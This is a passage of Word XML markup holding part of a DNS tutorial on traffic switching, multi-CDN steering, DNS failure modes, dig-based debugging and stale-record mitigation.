        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="796"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>VPN users getting direct access to internal resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2E7397" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="796"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Development environments resolving to staging servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D157266" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 DNS as a Feature Flag / Traffic Switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD28759" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blue-Green deployments via DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599F486F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAAA1C4" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Before:  www.example.com → blue-env.example.com → [blue servers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030CB512" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Switch:  www.example.com → green-env.example.com → [green servers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198B375A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Rollback: www.example.com → blue-env.example.com → [blue servers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD739F0" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Canary via weighted DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6662F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371AE32E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com → 95% stable-pool, 5% canary-pool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8A27D7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>A/B testing via DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58272B8F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Route specific client subnets (EDNS Client Subnet) to different backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BEFF96" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Enterprise customers (known IP ranges) → dedicated infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47601A3F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="797"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Free-tier users → shared infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDBCD5C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.3 DNS for Multi-CDN Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27622089" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> You use multiple CDN providers (Cloudflare, AWS CloudFront, Akamai) for redundancy and performance. How to route?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A86E0A3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS-based multi-CDN steering:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2364C840" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>A specialized DNS provider (Citrix ITM, NS1, Constellix):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C62FC9D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Receives client DNS query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C820A2C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Knows real-time performance of each CDN from that client's region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD0CA2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="798"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Cloudflare: 15ms from this network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A63BD" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="798"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>CloudFront: 25ms from this network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58812F09" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="798"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Akamai: 12ms from this network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF66341" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Returns the CNAME of the best-performing CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4A9F88" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="798"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Client connects to the fastest CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D72C67" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>If a CDN has an outage:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Health checks detect it, DNS stops returning that CDN's CNAME. Traffic automatically shifts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CF38F9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:pict w14:anchorId="57A453FD">
          <v:rect id="_x0000_i3491" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC95BDC" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. DNS Failure Modes and Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD5D1A1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>16.1 Common DNS Failure Modes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7C4A2" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SERVFAIL — Resolver cannot get an answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9F6F10" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="799"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Authoritative server is unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74AE74" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="799"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNSSEC validation failed (bogus signatures).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D55525D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="799"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Timeout on all upstream queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D45726E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="799"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Resolver itself is overloaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C43CC17" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NXDOMAIN — Name does not exist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF957EF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="800"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Typo in the domain name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF53E6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="800"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Record genuinely doesn't exist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703283DB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="800"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DNS hijacking (some ISPs redirect NXDOMAIN to their own search/ad page).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF95893" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="800"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Negative caching of a previously non-existent name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C7EE85" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>REFUSED — Server refuses to answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65164C77" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="801"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Querying a resolver that only serves its own clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23805D81" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="801"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Query type is blocked (e.g., ANY queries refused).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FE366" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="801"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Rate limiting triggered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4113891C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timeout — No response at all:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FD4D6" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="802"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Network path blocked (firewall blocking port 53).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3414CB2B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="802"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Server is down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC2F7A8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="802"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>DDoS attack consuming all server resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA3A2FF" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Debugging DNS Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B10EF7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The resolution chain diagnosis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3197FD29" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED7E929" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>1. Is the authoritative server responding correctly?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C188683" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   → Direct query: dig @ns1.example.com www.example.com A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ED2768" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="7C0D961F" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>2. Is the recursive resolver getting the right answer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30451F32" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   → Query through resolver: dig @8.8.8.8 www.example.com A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA856C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B"/>
    <w:p w14:paraId="026D6C49" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>3. Is the local machine getting the right answer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADFDD26" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   → System resolution: dig www.example.com A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3933D03A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C80E40" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>4. Is the application seeing the right answer?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD7642B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t xml:space="preserve">   → Application-level DNS check (curl -v, strace, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2ACB4A" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What dig +trace reveals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5D7E1" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Performs iterative resolution from root, showing every step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F7D8A3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493EAF78" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>.                       518400  IN  NS  a.root-servers.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DE68A9" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>com.                    172800  IN  NS  a.gtld-servers.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6361DB9B" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>example.com.            86400   IN  NS  ns1.example.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32BCB3" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>www.example.com.        300     IN  A   93.184.216.34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017DEE61" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:t>If any step returns unexpected results, you've identified where the problem is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572EC06D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.3 The "Stale DNS" Problem in Production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3798F07D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014EB704" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="803"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Your server's IP is 10.0.1.5. DNS TTL is 3600 (1 hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CFD27E" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="803"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>Server crashes. New server gets IP 10.0.1.6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CB14E7" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="803"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>You update DNS: www.example.com → 10.0.1.6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ED9ACB" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="803"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:t>For the next hour, many clients still connect to 10.0.1.5 (dead server) → timeouts/errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41580C0D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B" w:rsidP="006F072B">
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3324D" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keep old IP alive:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Run a redirector/proxy on the old IP that forwards to the new one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663D9D2C" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Low TTL before planned changes:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Reduce TTL days in advance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C37BB8" w14:textId="77777777" w:rsidR="006F072B" w:rsidRPr="006F072B" w:rsidRDefault="006F072B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="804"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F072B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Elastic IPs / VIPs:</w:t>
      </w:r>
      <w:r w:rsidRPr="006F072B">
        <w:t> Use a virtual IP that can be reassigned to any instance instantly (AWS Elastic IP, floating IP). DNS always points to the VIP. The VIP moves between machines.</w:t>
      </w:r>
    </w:p>
